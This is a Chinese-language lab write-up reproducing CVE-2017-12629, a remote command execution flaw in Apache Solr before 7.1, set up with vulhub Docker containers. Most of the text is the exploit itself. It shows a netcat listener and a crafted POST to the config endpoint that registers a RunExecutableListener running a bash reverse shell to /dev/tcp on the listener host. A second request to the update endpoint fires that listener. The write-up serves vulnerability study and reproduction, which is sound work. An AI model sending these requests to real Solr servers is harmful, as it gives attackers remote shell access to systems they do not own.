Apache Solr 远程命令执行漏洞复现（CVE-2017-12629）

前言

影响版本
Apache Solr < 7.1
Apache Lucene < 7.1

环境搭建

启动docker

systemctl start docker

获取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

进入对应目录

cd vulhub/solr/CVE-2017-12629-RCE/

启动容器

docker-compose up -d

查看容器

docker ps

漏洞复现

在centos上启动监听

nc -lvvp 80

创建一个listener

POST /solr/demo/config HTTP/1.1
Host: 192.168.164.162:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 185

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/192.168.164.162/80 0>&1"]}}

触发刚才添加的listener

POST /solr/demo/update HTTP/1.1
Host: 192.168.164.162:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]

参考文章

https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/